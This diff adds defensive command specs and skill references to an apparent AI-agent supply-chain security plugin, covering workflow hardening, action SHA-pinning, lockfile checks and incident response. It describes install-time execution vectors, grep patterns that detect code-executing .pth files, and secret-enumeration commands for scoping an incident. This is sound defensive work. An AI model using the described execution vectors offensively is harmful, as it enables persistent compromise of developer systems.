+Examples:
+- `/supply-chain-harden-workflow .github/workflows/release.yml`
+- `/supply-chain-harden-workflow .github/workflows/release.yml --apply`
+
+## Hardening Playbook
+
+For each transformation, evaluate applicability before proposing the change.
+
+1. **Deny-by-default permissions** — add `permissions: {}` at the workflow level if absent. Then add per-job `permissions:` blocks specifying only the scopes that job needs (`contents: read`, `id-token: write`, `packages: write`, etc.). Eliminates the broad `GITHUB_TOKEN` defaults.
+
+2. **Two-job build/publish split** — if the workflow has a single job that both builds and publishes artifacts, **refuse the split** and recommend manual restructure. Artifact handoff between jobs is structural and too risky to automate. Provide the recommended shape (build job uploads artifact; publish job consumes via `actions/download-artifact` and uses OIDC).
+
+3. **`--ignore-scripts` on npm installs** — for `run: npm install ...` or `run: npm ci ...` steps, add `--ignore-scripts` if not already present. Prevents `preinstall`/`postinstall`/`prepublish` lifecycle hooks from compromised dependencies.
+
+4. **`harden-runner` injection** — add as the first step of every job:
+
+   ```yaml
+   - uses: step-security/harden-runner@<sha>  # <version>
+     with:
+       egress-policy: audit
+   ```
+
+   Start with `audit` so legitimate egress is observed before tightening. The user should manually upgrade to `block` after one or two clean CI runs.
+
+5. **Environment gate on publish jobs** — for any job using `pypa/gh-action-pypi-publish`, `npm publish`, or other registry-publishing actions, add an `environment:` field if absent. Suggest a name like `<registry>-release`. Tell the user to configure reviewer requirements in repo Settings → Environments after applying.
+
+## Refusal Conditions
+
+The command refuses (and always explains why) when:
+
+- A single job both builds artifacts and publishes them — refuse the split; the user must manually restructure into two jobs with artifact handoff.
+- A workflow uses a local action (`uses: ./.github/actions/...`) with embedded scripts that cannot be statically analyzed — refuse hardening of that step and note it in the output.
+- The workflow file is not valid YAML — refuse and recommend running `yamllint` first.
+
+## Action Steps
+
+1. Read and YAML-parse the workflow file. If parsing fails, refuse.
+2. For each transformation in the Playbook, evaluate applicability and either prepare an edit or record a refusal with its reason.
+3. Build a unified diff from the prepared edits.
+4. Print the diff plus a numbered "what this changes and why" rationale section.
+5. If `--apply` was passed: edit the file in place; print the post-apply result.
+
+## Output (dry-run)
+
+```
+## Harden Workflow — Dry Run: .github/workflows/release.yml
+
+### Changes proposed
+(unified diff)
+
+### Rationale
+1. Added `permissions: {}` at workflow level — deny-by-default.
+2. Added `permissions: { contents: read }` to `build` job — minimum needed.
+3. Added `permissions: { id-token: write, contents: read }` to `publish` job — OIDC token + checkout.
+4. Added `--ignore-scripts` to `npm ci` step — prevents preinstall/postinstall script execution from compromised deps.
+5. Added `step-security/harden-runner` as first step of each job — egress audit.
+6. Added `environment: pypi-release` to `publish` job — gates with reviewer approval (configure in repo settings).
+
+### Refusals
+- None.
+
+### Apply
+Run with --apply to write changes.
+```
+
+## Important Notes
+
+- **Default is dry-run** — `--apply` is required to write.
+- This command applies a playbook; for one-off cases, use the `supply-chain-hardened-ci-cd` skill directly.
+- For SHA-pinning of `uses:` refs, run `/supply-chain-pin-actions` separately — different concern, different refusal conditions.
+- After applying, configure the GitHub Environment in repo Settings → Environments to add reviewer requirements; without that, the `environment:` field has no enforcement.
+- The `harden-runner` ref should itself be SHA-pinned; run `/supply-chain-pin-actions` after this command to lock it down.

--- a/plugins/supply-chain-security/commands/supply-chain-incident.md
+++ b/plugins/supply-chain-security/commands/supply-chain-incident.md
@@ -1,0 +1,125 @@
+---
+description: Walk through supply-chain incident response for an advisory, CVE, GHSA, package name, or campaign name. Engages the supply-chain-incident-responder agent. Performs the 4-point check (lockfile → CI cache → secrets → persistence) and produces a filled incident-report-template.md. Read-only.
+user-invocable: true
+allowed-tools:
+  - Read
+  - Glob
+  - Grep
+  - Bash
+  - WebFetch
+---
+
+# Supply Chain Incident Response
+
+Walk through structured incident response for a named supply-chain advisory or campaign — enumerate the blast radius, fill out the incident report, and recommend rotation order without modifying any state.
+
+## Arguments
+
+`$ARGUMENTS` — **Required**. One of:
+
+- A CVE or GHSA identifier (`CVE-2024-12345`, `GHSA-xxxx-xxxx-xxxx`).
+- A package name with version range (e.g., `axios@<1.6.7`, `chalk@5.3.1`).
+- A campaign name (e.g., `Shai-Hulud`, `TeamPCP`, `LiteLLM 1.82.8`).
+
+If no argument is supplied, prompt for one before proceeding.
+
+## Input Handling
+
+**Branch 1: CVE or GHSA identifier**
+- Fetch advisory via `WebFetch` from `https://github.com/advisories/<id>` (for GHSAs) or `https://nvd.nist.gov/vuln/detail/<id>` (for CVEs).
+- Parse the affected package name, the affected version range, and the exposure window dates.
+
+**Branch 2: Package name with version range**
+- Use directly; do not fetch.
+
+**Branch 3: Campaign name**
+- Look for a campaign reference at `plugins/supply-chain-security/skills/supply-chain-threat-awareness/references/campaigns/<campaign>.md`.
+- If present, load it for affected packages, exposure window, IoCs, and rotation guidance.
+- If not present, treat as a freeform query and proceed with best-effort lookup via `WebFetch`.
+
+## 4-Point Check
+
+### 1. Lockfile
+
+Search every detected lockfile for the affected package.
+
+```bash
+# Example for npm ecosystem
+git grep -nE '"<package-name>"' '**/package-lock.json' '**/yarn.lock' '**/pnpm-lock.yaml'
+```
+
+Report each match with file:line and the resolved version. For Python, search `uv.lock`, `poetry.lock`, `pixi.lock`, `conda-lock.yml`. For Rust, `Cargo.lock`. For Go, `go.sum`.
+
+### 2. CI cache
+
+If `gh` CLI is available and the repo is on GitHub:
+
+```bash
+gh actions cache list --json key,createdAt,sizeInBytes,ref --limit 100
+```
+
+Identify caches created on or after the exposure window start date. Compromised dependencies may persist in CI cache even after lockfile fixes.
+
+### 3. Secrets
+
+Enumerate secrets that may have been exposed to the compromised step:
+
+```bash
+gh secret list
+gh secret list --env <env>   # per-environment
+```
+
+Grep workflows for usage:
+
+```bash
+grep -rnE 'secrets\.[A-Z_]+|env:' .github/workflows/
+```
+
+Categorize each exposed secret by access type:
+- **Registry**: npm tokens, PyPI tokens, Docker Hub PATs.
+- **Cloud**: AWS/GCP/Azure keys, OIDC trust relationships.
+- **Signing**: Sigstore/cosign keys, GPG keys.
+
+### 4. Persistence
+
+Hunt for installer-implanted artifacts. Ecosystem-specific:
+
+- **npm**: `find node_modules/.bin -newer <date>` to find binaries added during the exposure window. Inspect `.npmrc` for unexpected registry overrides.
+- **Python**: `find $(python -c 'import site;print(site.getsitepackages()[0])') -name "*.pth"` — inspect every `.pth` file; benign ones contain only path strings, malicious ones contain executable Python.
+- **Cargo**: identify `build.rs` files in installed crates that built after the exposure window via `find ~/.cargo/registry -name build.rs -newer <date>`.
+
+## Action Steps
+
+1. Parse the advisory or campaign name and confirm the affected package(s), version range(s), and exposure window.
+2. Run the lockfile check across every detected ecosystem.
+3. Run the CI cache check (if `gh` and GitHub are available).
+4. Enumerate secrets in scope and categorize by access type.
+5. Run the ecosystem-specific persistence artifact hunt.
+6. Fill the incident report template — see Output.
+7. Recommend rotation order per `plugins/supply-chain-security/skills/supply-chain-incident-response/references/secret-rotation.md`.
+
+## Output
+
+Load the template from:
+
+```
+plugins/supply-chain-security/skills/supply-chain-incident-response/assets/incident-report-template.md
+```
+
+Produce a filled copy. Save to `incident-<id>-<YYYYMMDD>.md` in the current working directory unless the user supplies an alternate path.
+
+The filled report must contain:
+
+- Advisory identifiers and affected version range.
+- Lockfile findings (file:line citations).
+- CI cache findings (cache keys built during exposure).
+- Secrets in scope, by category and recommended rotation order.
+- Persistence artifacts found (or "none observed").
+- Recommended next steps with explicit follow-up commands.
+
+## Important Notes
+
+- **Read-only**: this command does not rotate secrets, modify lockfiles, or invalidate caches. It enumerates the work and produces the report; the user runs the rotation/invalidation commands themselves.
+- Engages the `supply-chain-incident-responder` agent for runbook judgment calls (severity classification, rotation order, communication templates).
+- For tag-hijack incidents, also invoke `/supply-chain-pin-actions` after eradication to lock the workflow against recurrence.
+- If `gh` CLI is unavailable, skip Step 3 but note in the report that CI cache must be reviewed manually.

--- a/plugins/supply-chain-security/commands/supply-chain-lockfile-check.md
+++ b/plugins/supply-chain-security/commands/supply-chain-lockfile-check.md
@@ -1,0 +1,81 @@
+---
+description: Check lockfile health across all detected ecosystems (npm, PyPI, conda/pixi, cargo, Go). Verifies committed status, CI usage, hash pinning, floating versions, and cooldown discipline. Narrower than /supply-chain-audit. Read-only.
+user-invocable: true
+allowed-tools:
+  - Read
+  - Glob
+  - Grep
+  - Bash
+---
+
+# Supply Chain Lockfile Check
+
+Focused, per-ecosystem lockfile health check — verifies that every detected ecosystem has a committed lockfile, that CI installs from it, that hashes are pinned where supported, and that updates respect cooldown discipline.
+
+## Arguments
+
+`$ARGUMENTS` — Optional path to a project directory. Defaults to the current working directory.
+
+## Detected Lockfiles
+
+| Lockfile | Ecosystem | CI invocation |
+|----------|-----------|---------------|
+| `package-lock.json` | npm | `npm ci` |
+| `yarn.lock` | yarn | `yarn install --frozen-lockfile` |
+| `pnpm-lock.yaml` | pnpm | `pnpm install --frozen-lockfile` |
+| `uv.lock` | uv | `uv sync --frozen` |
+| `poetry.lock` | poetry | `poetry install --no-update` |
+| `pixi.lock` | pixi | `pixi install` |
+| `conda-lock.yml` | conda | `conda-lock install` |
+| `Cargo.lock` | cargo | `cargo build --locked` |
+| `go.sum` | Go | `go mod download` (with `GOFLAGS=-mod=readonly`) |
+
+## Per-Lockfile Checks
+
+For each detected lockfile, evaluate:
+
+1. **Committed** — file is tracked in git.
+   ```bash
+   git ls-files | grep <lockfile>
+   ```
+2. **Used in CI** — at least one workflow invokes the lockfile-respecting install command.
+   ```bash
+   grep -rnE '<install-command>' .github/workflows/
+   ```
+3. **Hash-pinned** — where the lockfile format supports it, hashes are present (npm `integrity:`, uv `hashes`, Cargo `checksum`).
+4. **No floating versions in source manifest** — e.g., `package.json` has no `*` or `latest`; `pyproject.toml` has no unbounded `>=` without an upper bound; `Cargo.toml` uses precise version requirements.
+5. **Cooldown discipline** — lockfile commits should be spaced (recommendation: ≥7 days between bulk updates) to allow community detection of compromised releases.
+   ```bash
+   git log --follow --pretty=format:"%h %ai" <lockfile> | head -20
+   ```
+
+## Output
+
+```markdown
+## Lockfile Check Report: <path>
+
+### Detected Ecosystems
+- <ecosystem>: <lockfile path>
+
+### Per-Lockfile Health
+
+#### <lockfile>
+
+| Criterion | PASS/WARN/FAIL | Evidence |
+|-----------|----------------|----------|
+| Committed | ... | ... |
+| Used in CI | ... | <workflow file:line referencing the install command> |
+| Hash-pinned | ... | ... |
+| No floating versions | ... | ... |
+| Cooldown discipline | ... | <last 5 lockfile commits with timestamps> |
+
+### Recommended Actions
+- <fix>: <command or skill reference>
+```
+
+## Important Notes
+
+- **Read-only**: this command does not modify lockfiles or workflows.
+- For broader supply-chain posture (action pinning, permissions, provenance), run `/supply-chain-audit`.
+- For incident-specific lockfile triage (a particular CVE or compromised package), run `/supply-chain-incident <advisory>`.
+- Cooldown discipline is a heuristic — emergency security updates are an exception, not a violation.

--- a/plugins/supply-chain-security/commands/supply-chain-pin-actions.md
+++ b/plugins/supply-chain-security/commands/supply-chain-pin-actions.md
@@ -1,0 +1,119 @@
+---
+description: Convert mutable GitHub Actions refs (@v4, @main, @latest) in .github/workflows/*.yml to 40-char commit SHAs with trailing tag comments. Dry-run by default — pass --apply to write. Refuses to apply when a SHA cannot be uniquely resolved or the ref is a branch name.
+user-invocable: true
+allowed-tools:
+  - Read
+  - Glob
+  - Grep
+  - Edit
+  - Bash
+  - WebFetch
+---
+
+# Supply Chain Pin Actions
+
+Resolve every mutable `uses:` reference in GitHub Actions workflow files to an immutable 40-character commit SHA, with the original tag preserved as a trailing comment for human readability.
+
+## Arguments
+
+- **First positional** (optional): path to a single workflow file or a directory of workflow files. Defaults to `.github/workflows/`.
+- `--apply`: write changes to disk. Without this flag the command runs in **dry-run mode** and only prints the diff.
+
+Examples:
+- `/supply-chain-pin-actions` — dry-run across `.github/workflows/`
+- `/supply-chain-pin-actions .github/workflows/release.yml` — dry-run single file
+- `/supply-chain-pin-actions --apply` — write changes after review
+
+## Resolution Algorithm
+
+For each line matching `uses: <owner>/<repo>@<ref>`:
+
+1. **Already pinned**: if `<ref>` is exactly 40 hex characters, skip (already immutable).
+
+2. **Tag ref**: if `<ref>` matches `v\d` or `v\d+\.\d+(\.\d+)?` (e.g., `v4`, `v4.2.2`), resolve via:
+
+   ```bash
+   gh api repos/<owner>/<repo>/git/refs/tags/<ref> --jq '.object.sha'
+   ```
+
+   If the returned object's `type` is `"tag"` (annotated tag), dereference one level to the underlying commit:
+
+   ```bash
+   gh api repos/<owner>/<repo>/git/tags/<sha> --jq '.object.sha'
+   ```
+
+3. **Branch ref**: if `<ref>` is `main`, `master`, `latest`, `release/v1`, or any name that does not match the tag pattern, **refuse to apply** — branch refs are mutable by design; the user must pick a tag.
+
+4. **Annotation**: append the original ref as a trailing comment:
+
+   ```
+   uses: <owner>/<repo>@<sha>  # <ref>
+   ```
+
+## Refusal Conditions
+
+The command refuses (and always explains why) when:
+
+- `<ref>` is a branch name rather than a tag — user must pick a tag.
+- A tag resolves to multiple SHAs (rare; usually a force-push or alias) — manual review required.
+- The action repo is no longer accessible (404 from `gh api`) — manual review required.
+- The `uses:` line is inside a comment block (starts with `#`) — already disabled.
+
+## Action Steps
+
+1. Glob workflow files under the target path.
+2. For each file, parse all `uses:` lines.
+3. For each ref, run the Resolution Algorithm; collect SHA resolutions and refusal reasons.
+4. Build a unified diff per file showing the proposed change.
+5. Print the combined diff plus a summary.
+6. If `--apply` was passed:
+   - For each file with non-refusal changes, edit in place.
+   - Print: `<n> files modified; <n> refs pinned; <n> refs refused`.
+
+## Output (dry-run mode)
+
+```
+## Pin Actions — Dry Run
+
+### .github/workflows/release.yml
+
+--- a/.github/workflows/release.yml
++++ b/.github/workflows/release.yml
+@@ -10,7 +10,7 @@
+       - uses: actions/checkout@v4
++      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
+@@ -15,7 +15,7 @@
+-      - uses: pypa/gh-action-pypi-publish@release/v1
++REFUSED: pypa/gh-action-pypi-publish@release/v1 — branch ref. Pick a tag (e.g., v1.10.3) and rerun.
+
+### Summary
+- 5 refs would be pinned across 3 files.
+- 1 ref refused (branch ref). Resolve manually before applying.
+
+### Apply
+Run with --apply to write changes.
+```
+
+## Output (apply mode)
+
+```
+## Pin Actions — Applied
+
+### .github/workflows/release.yml
+- actions/checkout@v4 -> 11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
+
+### Summary
+- 5 refs pinned across 3 files.
+- 1 ref refused (branch ref). Resolve manually.
+
+Verify the diff: git diff .github/workflows/
+Commit when ready: git commit -am "ci: SHA-pin GitHub Actions"
+```
+
+## Important Notes
+
+- **Default is dry-run** — `--apply` is required to write.
+- Always review the diff before applying.
+- The trailing tag comment is best-effort; it preserves the human-readable version next to the SHA.
+- For full hardening (permissions, two-job split, harden-runner, environment gates), follow up with `/supply-chain-harden-workflow`.
+- If `gh` CLI is not authenticated, the command will fail at SHA resolution — run `gh auth login` first.

--- a/plugins/supply-chain-security/skills/supply-chain-dependency-security/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-dependency-security/SKILL.md
@@ -1,0 +1,52 @@
+---
+name: supply-chain-dependency-security
+description: Dependency and lockfile supply-chain security review with 2025–2026 attack campaign patterns. Use when reviewing package.json, pyproject.toml, requirements.txt, pixi.toml, conda-lock.yml, or any lockfile; when evaluating a new dependency for addition; or when responding to a supply-chain compromise incident. Contains patterns for detecting maintainer-account-takeover style attacks that CVE scanners miss.
+---
+
+# Supply Chain Dependency Security
+
+## Threat Model (2025–2026)
+
+The dominant supply-chain threat is **maintainer account takeover of legitimate, widely-trusted packages** — not typosquatting. Your CVE scanner will not catch these.
+
+Active campaigns:
+- **Shai-Hulud**: 500+ npm packages compromised via maintainer account takeover
+- **TeamPCP**: Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP — targeted at security tooling
+- **axios**: 100M weekly downloads; compromise via release tag hijack
+- **LiteLLM 1.82.8**: malicious `.pth` file injected for persistent execution on every Python startup
+
+## Review Checklist
+
+### Lockfiles
+
+- [ ] Lockfile committed (`package-lock.json`, `yarn.lock`, `poetry.lock`, `uv.lock`, `pixi.lock`, `conda-lock.yml`)
+- [ ] Lockfile is used in CI (`npm ci`, `pip install --require-hashes`, `uv sync --frozen`, `pixi install`)
+- [ ] No floating version specs in production paths (e.g., `*`, `>=x` without upper bound in lockfile-less environments)
+
+### Install-time script execution
+
+- [ ] `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) in all CI environments
+- [ ] `preinstall`/`postinstall` hooks are the dominant execution vector — verify no hooks run untrusted code
+- [ ] Python: check for unexpected `.pth` files that execute on every interpreter start:
+  ```bash
+  find $(python -c "import site; print(site.getsitepackages()[0])") -name "*.pth"
+  ```
+
+### Dependency freshness and cooldown
+
+- [ ] New dependencies are held for ≥7 days before merging — most malicious releases are yanked within hours
+- [ ] Version pins in lockfile match expected package metadata (author, homepage, hash)
+- [ ] No unpinned `latest` or `*` in production dependency specs
+
+### Incident response
+
+When a compromise is reported:
+1. Identify affected version range from the advisory
+2. Check if that version range is in the lockfile
+3. Check if the install was cached (CI cache may still contain the compromised version)
+4. Rotate any secrets or tokens accessible from the CI environment where the package ran
+5. Check for persistence artifacts: `.pth` files, `postinstall` side effects, modified `node_modules/.bin/`
+
+## Findings format
+
+Name the vulnerability class, cite the package name + version + advisory or campaign name, state blast radius (what can the package access at install time), and propose the fix (version pin, lockfile update, `--ignore-scripts`).

--- a/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/SKILL.md
+++ b/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/SKILL.md
@@ -1,0 +1,118 @@
+---
+name: supply-chain-ecosystem-quirks
+description: Ecosystem-specific supply-chain gotchas for npm, PyPI, conda/pixi, cargo, and Go. Use when reviewing package.json + .npmrc, pyproject.toml + setup.py, pixi.toml + conda-lock.yml, Cargo.toml + .cargo/config.toml, or go.mod + GOPROXY config — any time a supply-chain recommendation depends on which ecosystem you're in. Loads ecosystem-specific reference docs on demand.
+metadata:
+  references:
+    - references/npm-quirks.md
+    - references/pypi-quirks.md
+    - references/conda-pixi-quirks.md
+    - references/cargo-go-quirks.md
+---
+
+# Supply Chain Ecosystem Quirks
+
+## Threat Model
+
+Each package manager has unique install-time execution vectors and config knobs that decide whether the general patterns from `supply-chain-dependency-security` and `supply-chain-hardened-ci-cd` actually hold. Escape hatches that need explicit auditing per ecosystem: npm `postinstall`, Python `.pth` and `setup.py`, unsigned conda channels, Cargo `build.rs`, `GOSUMDB=off`.
+
+## Ecosystem Detection and References
+
+Trigger files identify which ecosystem is in scope; each row lists the reference doc to load for the full checklist. Run the bash one-liner to auto-detect, or scan the trigger column manually.
+
+| Ecosystem | Trigger files | Reference |
+|-----------|---------------|-----------|
+| npm / yarn / pnpm | `package.json`, `.npmrc`, `package-lock.json`, `yarn.lock`, `pnpm-lock.yaml` | `references/npm-quirks.md` |
+| PyPI / pip / uv / poetry | `pyproject.toml`, `setup.py`, `requirements.txt`, `uv.lock`, `poetry.lock` | `references/pypi-quirks.md` |
+| conda / pixi | `pixi.toml`, `pixi.lock`, `environment.yml`, `conda-lock.yml`, `.condarc` | `references/conda-pixi-quirks.md` |
+| cargo | `Cargo.toml`, `Cargo.lock`, `.cargo/config.toml` | `references/cargo-go-quirks.md` |
+| Go | `go.mod`, `go.sum`, `GOPROXY` env | `references/cargo-go-quirks.md` |
+
+```bash
+# Auto-detect: prints one line per ecosystem present, naming the reference doc to load
+test -f package.json && echo "npm -> references/npm-quirks.md"
+{ test -f pyproject.toml -o -f setup.py -o -f requirements.txt; } && echo "PyPI -> references/pypi-quirks.md"
+{ test -f pixi.toml -o -f environment.yml -o -f conda-lock.yml; } && echo "conda -> references/conda-pixi-quirks.md"
+test -f Cargo.toml && echo "cargo -> references/cargo-go-quirks.md"
+test -f go.mod && echo "Go -> references/cargo-go-quirks.md"
+```
+
+If nothing prints, the project has no packaging-manifest layer this skill covers — return the no-op report (bottom of file).
+
+## Quick-Check Battery
+
+Run this block from the project root. Each line either prints nothing (PASS) or emits a `FAIL:` / `WARN:` line you can `grep FAIL:` on. Skip ecosystems not present.
+
+```bash
+# npm — install-time scripts, lockfile, CI command discipline
+grep -q 'ignore-scripts=true' .npmrc 2>/dev/null || echo "npm FAIL: set ignore-scripts=true in .npmrc"
+test ! -f package.json || test -f package-lock.json || echo "npm FAIL: package-lock.json not committed"
+grep -rE 'npm (install|ci)' .github/workflows/ 2>/dev/null | grep -v 'npm ci' && echo "npm FAIL: CI must use 'npm ci'"
+
+# PyPI — .pth code execution, PEP 517 isolation, custom build backend
+find $(python -c 'import site;print(site.getsitepackages()[0])' 2>/dev/null) -name '*.pth' -exec grep -lE '^(import|exec|os\.|subprocess)' {} \; 2>/dev/null | sed 's/^/pypi FAIL: code-executing .pth: /'
+grep -rE 'no-build-isolation' .github/workflows/ Makefile *.sh 2>/dev/null && echo "pypi FAIL: --no-build-isolation removes PEP 517 isolation"
+grep -E '^backend-path' pyproject.toml 2>/dev/null && echo "pypi WARN: custom backend-path — audit build backend code"
+
+# conda/pixi — channel discipline, escape hatches
+grep -A 5 '^channels:' .condarc pixi.toml 2>/dev/null | grep -q 'defaults' && echo "conda WARN: 'defaults' channel present; prefer conda-forge"
+grep -rE '(--no-deps|--no-pin|--force-reinstall)' .github/workflows/ Makefile *.sh 2>/dev/null && echo "conda FAIL: lockfile escape hatch in CI"
+
+# cargo — build.rs surface, --locked discipline
+find . -name 'build.rs' -not -path './target/*' 2>/dev/null | head -5 | sed 's/^/cargo INFO: build.rs present: /'
+grep -rE 'cargo (build|test|run)' .github/workflows/ 2>/dev/null | grep -v -- '--locked' && echo "cargo FAIL: CI cargo without --locked"
+
+# Go — GOPROXY/GOSUMDB integrity, -mod=readonly
+go env GOSUMDB 2>/dev/null | grep -qE '^(off|)$' && echo "go FAIL: GOSUMDB is off or unset"
+grep -rE 'go (build|test|run)' .github/workflows/ 2>/dev/null | grep -v 'mod=readonly\|mod=vendor' && echo "go WARN: CI go build without -mod=readonly"
+```
+
+Each printed line maps to one row in the report. For each FAIL, load the matching reference for full remediation guidance.
+
+## Application Workflow
+
+Run the four steps below in order. Each step is independently re-runnable.
+
+### Step 1 — Detect ecosystems present
+
+Run the auto-detect bash one-liner under `## Ecosystem Detection and References`. Record the printed reference paths — these are the only references to load.
+
+### Step 2 — Run the quick-check battery
+
+Run the `## Quick-Check Battery` block. Pipe to `tee quick-check.out`; every `FAIL:` line is a P1 finding handled in step 3, every `WARN:` is a P2.
+
+### Step 3 — Load the matching reference for each FAIL or deep review
+
+For each ecosystem flagged in step 2, or any ecosystem the user asked for a detailed review of, open `references/<eco>-quirks.md`. Each reference document follows the same shape: a threat-relevance paragraph plus 5-6 sectioned checks, each with a verifying command you can copy-paste. Map each section to PASS/WARN/FAIL using the section's verifying command.
+
+### Step 4 — Cross-reference findings against general patterns
+
+Compare each finding to the equivalent control in `supply-chain-dependency-security` (lockfiles, pinning, scanning) and `supply-chain-hardened-ci-cd` (OIDC, ephemeral runners, secret hygiene). If an ecosystem quirk conflicts with general guidance — for example, `pnpm`'s strict isolation makes the general "vendor dependencies" guidance unnecessary — the ecosystem-specific quirk wins for that ecosystem. Note the conflict in the report.
+
+## Output: Ecosystem Quirks Report
+
+Every PASS/WARN/FAIL must cite a `file:line` (or `absent`). Every remediation must name a concrete command, skill, or config knob.
+
+```markdown
+## Ecosystem Quirks Posture: <project>
+
+### Ecosystems Detected
+| Ecosystem | Evidence (trigger file path) | Reference loaded |
+|-----------|------------------------------|------------------|
+
+### Per-Ecosystem Findings
+For each detected ecosystem:
+
+#### <ecosystem>
+| Quirk / control | PASS/WARN/FAIL | Evidence (file:line) | Remediation (command or skill) |
+|-----------------|----------------|----------------------|-------------------------------|
+
+### Cross-Ecosystem Conflicts with General Patterns
+Cite any place an ecosystem quirk overrides `supply-chain-dependency-security` or `supply-chain-hardened-ci-cd`.
+
+### Top Priority Actions
+1. <highest-impact runnable remediation>
+2. <second>
+3. <third>
+```
+
+If no ecosystems detected: return `No supported package-manager manifests found; this skill does not apply.`

--- a/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/cargo-go-quirks.md
+++ b/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/cargo-go-quirks.md
@@ -1,0 +1,104 @@
+# cargo / Go Supply Chain Quirks
+
+## Threat Relevance
+
+Rust and Go are often perceived as safer-by-default ecosystems, but both have install-time or build-time execution surfaces that the general "pin and scan" advice from `supply-chain-dependency-security` does not address. Cargo runs `build.rs` for every crate that has one on every build, with no global disable. Go's `go generate` and module-proxy/checksum-database settings (`GOPROXY`, `GOSUMDB`) decide whether the supply-chain integrity guarantees actually hold. Misconfigure either, and the lockfile/`go.sum` is decorative.
+
+## Cargo build.rs Arbitrary Execution
+
+Every `cargo build` of a crate that ships a `build.rs` file executes that script at build time with the project's privileges. There is no global "disable build scripts" flag — `build.rs` is a first-class Cargo feature used for legitimate native-library linking and codegen. That makes auditing the contents of `build.rs` the only mitigation.
+
+Find every `build.rs` pulled into the build (project plus cached crate source):
+
+```bash
+find . -name build.rs -not -path './target/*' | head -20
+find ~/.cargo/registry/src -name build.rs 2>/dev/null | head -20
+```
+
+For a specific suspicious crate:
+
+```bash
+find ~/.cargo/registry/src -path "*<crate-name>*/build.rs"
+```
+
+Cargo provides no built-in attestation that a `build.rs` is the same one published to crates.io. Tools like `cargo-vet` and `cargo-crev` provide human-audited trust databases — recommend `cargo vet` for any project where the dependency graph contains unfamiliar crates.
+
+## .cargo/config.toml Registries
+
+`.cargo/config.toml` (project-local or `~/.cargo/`) can configure alternative registries. Any non-crates.io registry is a supply-chain decision that needs explicit review.
+
+Audit:
+
+```bash
+grep -A 2 '\[registries\.' .cargo/config.toml ~/.cargo/config.toml 2>/dev/null
+grep -A 2 '\[source\.' .cargo/config.toml ~/.cargo/config.toml 2>/dev/null
+```
+
+`[source]` blocks can redirect crates.io to a mirror — a legitimate use is an air-gapped corporate proxy, an illegitimate use is dependency-confusion via a typo-mirror. Verify the URL and document the choice.
+
+## Cargo.lock Discipline
+
+For binary crates, `Cargo.lock` is committed and `cargo build --locked` refuses to update it. For library crates the convention has been "do not commit," but for security-sensitive libraries commit anyway — the lock applies when downstream consumers run `cargo build --locked` against your repo (e.g., when building from a Git dependency).
+
+Verify CI respects the lock:
+
+```bash
+grep -rE 'cargo (build|test|run)' .github/workflows/ | grep -v -- '--locked'
+```
+
+Any `cargo build` without `--locked` in CI is a finding — it permits silent dep upgrades.
+
+## Go //go:generate Directives
+
+`go generate ./...` walks Go files and executes any line starting with `//go:generate ` as a shell command. Less risky than Cargo's `build.rs` because `go generate` only runs on explicit invocation (not on every `go build`), but a malicious or compromised dep can ship a directive that runs the first time a developer or CI invokes generate.
+
+Audit before running `go generate` on a fresh dep:
+
+```bash
+grep -rn '^//go:generate ' . | head -50
+```
+
+For a specific module:
+
+```bash
+grep -rn '^//go:generate ' $(go env GOMODCACHE)/<module>@<version>
+```
+
+Flag any directive that fetches from the network or writes outside the module directory.
+
+## GOPROXY and GOSUMDB Discipline
+
+Go's module integrity rests on two settings:
+
+- `GOPROXY=https://proxy.golang.org,direct` — module proxy with fallback to direct VCS. The proxy provides immutability (a published version cannot be silently replaced).
+- `GOSUMDB=sum.golang.org` — checksum database. Every module fetched is verified against a globally-consistent transparency log.
+
+Disabling either weakens the chain. Check:
+
+```bash
+go env GOPROXY GOSUMDB GOFLAGS
+```
+
+If `GOSUMDB=off` or `GOFLAGS` contains `-insecure`, flag and investigate why. If `GOPROXY=direct` (or `off`), the proxy's immutability is bypassed and `go.sum` is the only check — sufficient for trusted deps but loses the transparency-log audit trail.
+
+The corresponding controls in CI:
+
+```bash
+# Block silent go.sum changes
+go build -mod=readonly ./...        # refuses to add new entries
+go mod verify                        # checks downloaded modules match go.sum
+```
+
+Audit:
+
+```bash
+grep -rE 'go (build|test|run)' .github/workflows/ | grep -v 'mod=readonly\|mod=vendor'
+```
+
+## References
+
+- Cargo build scripts: <https://doc.rust-lang.org/cargo/reference/build-scripts.html>
+- cargo-vet: <https://mozilla.github.io/cargo-vet/>
+- Go module proxy protocol: <https://go.dev/ref/mod#module-proxy>
+- Go checksum database: <https://sum.golang.org/>
+- `go generate`: <https://go.dev/blog/generate>

--- a/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/conda-pixi-quirks.md
+++ b/plugins/supply-chain-security/skills/supply-chain-ecosystem-quirks/references/conda-pixi-quirks.md
@@ -1,0 +1,79 @@
+# conda / pixi Supply Chain Quirks
+
+## Threat Relevance
+
+The conda ecosystem covers compiled scientific software (CUDA, GDAL, BLAS, etc.) that PyPI wheels often can't provide reproducibly. But conda's trust model is fundamentally different from npm/PyPI: there is no cryptographic package signing in mainstream use as of 2026 — trust is derived from channel reputation. That makes channel discipline, lockfile use, and the install escape hatches (`--no-deps`, `--no-pin`, `--force-reinstall`) the primary supply-chain controls. The general "verify signatures" advice from `supply-chain-sbom-provenance` does not apply to conda packages; document this gap for stakeholders.
+
+## Channel Priority and the defaults Channel Risk
+
+`conda-forge` is the community-governed channel with reviewer-gated PRs and reproducible recipes. `defaults` (Anaconda Inc.) has different governance, different versions, and as of 2024 a commercial license for orgs above a revenue threshold. Pixi defaults to `conda-forge`; classic conda defaults to `defaults` first.
+
+Audit `.condarc` or `pixi.toml`:
+
+```bash
+conda config --show channels
+grep -A 5 '^channels:' .condarc pixi.toml 2>/dev/null
+```
+
+If `defaults` is at the top of the channel list, evaluate whether the project can switch to conda-forge-only:
+
+```bash
+conda config --remove channels defaults
+conda config --add channels conda-forge
+conda config --set channel_priority strict
+```
+
